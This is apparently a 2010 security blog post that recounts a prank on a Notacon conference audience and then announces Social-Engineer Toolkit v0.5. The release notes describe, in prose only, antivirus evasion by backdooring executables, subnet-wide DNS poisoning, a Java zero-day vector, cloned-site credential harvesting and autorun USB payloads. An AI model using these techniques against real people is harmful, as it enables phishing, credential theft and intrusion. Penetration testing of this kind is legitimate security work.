Skip to Main Content
April 17, 2010

Social-Engineering your audience at Notacon

Written by David Kennedy
Security Testing & Analysis Social Engineering
I was sitting at home the night before Notacon, and decided well I can go the usual and normal route and just go through my slides show some wicked cool stuff, and be done with a good talk. Instead, I decided this is a good opportunity to mess with my audience and do something unique. I came up with the idea that due to legal reasons I wouldn't be able to talk about SET and start talking about "Advanced NMAP Syntax", which was really going to be very basic and a horrible presentation. Half way through, I was planning on saying oh you've been SE'd and gauge the audience. Well, good idea, but still not spectacular and kind of cheesy... A friend called and implanted an idea in my head the day of Notacon, and all of a sudden, the plan was in full force. My coworker Josh Kelley was coming down to Notacon and was my perfect candidate to help out. The Plan - SE the Audience. Fifteen minutes before the talk, I called Chris (LoganWHD) from and told him of my evil plan, at the same time I pretended agitated and in a rush to get out. I gave Josh my bag containing my computer and stormed out of Notacon. I ended up hiding down the street from Notacon, Josh called me in a fake panic claiming he couldn't find the PowerPoint and that the only one on the drive was an "Advanced NMAP" presentation. Having no other alternative, and explaining to the audience, Josh began his presentation talking about NMAP and explaining about how useful the -v command is and how important it is within NMAP. I really tried to make the presentation absolutely horrible in every way shape and form. From the description given, the audience appeared agitated, confused, angry, and trying to figure out a way to escape the presentation without being rude. Ahhh, the perks of social-engineering and common courtesy within human beings, thanks guys :-) With a couple of helpers Lars and Jamie, I received a call when Josh came to his second slide. I started upstairs to make sure I was ready. Josh then got to his last slide (which lasted a total of maybe 3-5 minutes) and said this: "Social Engineering is defined as the process of deceiving people into giving away access or confidential information. It could also be defined as getting a bunch of people in the audience at Notacon into thinking this is a NMAP talk :)" As soon as I heard that from outside the door, I came inside the door and said: "No more “Lets pop a box”, it’s “Let’s SE the audience”. You could see a sigh of relief from the audience followed by laughter and claps. Overall seemed to be a pretty successful and fun time with the Notacon audience and thanks to the audience for taking it so well! Overall the talk went well, received lots of questions and sheer amazement at this release and the direction of the toolset. I have to say, this was a fun presentation and was good SEing the entire audience :-) Real special thanks to Josh (Winfang) for getting up there and intentionally presenting horribly and getting people to say WTF for a short period of time :-) We love you buddy. Also thanks to KaosPunk and Nick for arranging the intro and going along with it, thanks guys! With this release and to quote the blog, here are the changes and intros onto SET v0.5: The Social-Engineer Toolkit (SET) has progressed over the months thanks to the suggestions and collaboration with the security community. With this version, I am proud to announce the immediate release of the Social-Engineer Toolkit v0.5. Before getting into the new attack vectors, let’s talk about the improvements from 0.4 to 0.5: * The ability to utilize the -x flag within Metasploit, this is much better for A/V bypass. SET has a built in legitimate executable that it backdoors. Running this through VirusTotal showed only 1 A/V company was picking this up and it was hit and miss. * Over 35 bug fixes, I spent a large time beta testing and giving it to people that would test it to find issues with it. Thanks to all of the beta testers, your help was awesome. * Ettercap no longer does the single HREF replacement custom filter method. Instead, it DNS poisons the entire subnet your on and redirects them back to your malicious site. You can utilize either a single site for example or do a “*” which will do every single site. * Rehauled the custom web server within Python to now handle POST requests, this will come into play later. * Added the latest Sun Java zero-day vulnerability into the Metasploit attack vector. * Added better user-agent handling to impersonate Firefox better when ripping a site. * Expanded the site templates instead of the “Java Required” website, there are now pre-defined templates you can use. If those changes weren’t enough, lets discuss the new vectors available to you in SET v0.5: Harvesting Credentials: You can now utilize the credential harvester method in conjunction with the website cloning to harvest usernames and passwords. Essentially, SET will first clone a website. You then coax a victim into coming to the site, and it will rewrite the webpages post parameters to POST to the local server which stores them. After that, the victim is redirected back to the original site you cloned. Reporting Engine: After your finished owning the target through SET’s attack vectors, an HTML based report as well as an XML export will be generated with all of the parameters it was able to harvest. This attack vector alone is a great addition to the toolkit, and allows the ability to do something other then complete pwnage. Custom HakSaw – The SET way: The next addition allows you to create a infectious USB/DVD/CD with a simple autorun.inf. This attack is pretty simple but will get more advanced as we go down the road. Essentially, a folder is created which you can burn to a DVD/CD and when it is inserted into a machine with autorun enabled, it will execute a Metasploit payload for you. SET has taken a life on of its own. Even though there are countless hours into perfecting this tool, I want to thank all the people who have helped with ideas, vectors, code and testing. We are all very excited about this release and the new capabilities it brings to the toolkit. If you have any questions, new feature ideas, or bugs, always feel free to report them to: [email protected].